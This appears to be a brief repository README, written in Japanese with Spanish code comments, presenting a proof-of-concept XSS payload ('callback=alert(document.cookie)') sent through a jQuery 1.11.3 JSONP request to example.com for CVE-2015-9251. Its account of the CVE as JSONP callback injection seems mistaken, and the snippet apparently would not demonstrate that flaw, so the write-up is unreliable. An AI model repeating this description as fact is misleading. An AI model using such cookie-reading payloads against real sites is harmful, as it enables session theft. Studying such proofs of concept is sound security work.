
CVE-2015-9251(jQuery 3.0.0 未満)向け PoC
CVE-2015-9251(3.0.0 未満の jQuery)向けの PoC。
このリポジトリには、jQuery ライブラリの脆弱性 CVE-2015-9251 に対する Proof of Concept(PoC) が含まれています。この脆弱性は、jQuery が 3.0.0 より前のバージョンで callback パラメータへのコード注入を許可していたため、サニタイズされていない JSONP 呼び出しを介したクロスサイトスクリプティング(XSS)攻撃を可能にします。
CVE-2015-9251 は、3.0.0 より前のバージョンの jQuery に影響します。この脆弱性は、JSONP リクエスト内の callback パラメータを操作することで悪用され、被害者のブラウザ上で任意の JavaScript コードを実行できる可能性があります。これにより、セッション Cookie などの機密データが漏えいする可能性があります。
PoC を実行するには、次の手順に従います。
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
// Función que simula una solicitud a un servidor vulnerable
$.ajax({
url: "https://example.com/api?callback=alert(document.cookie)",
dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
success: function(response) {
console.log(response);
}
});
</script>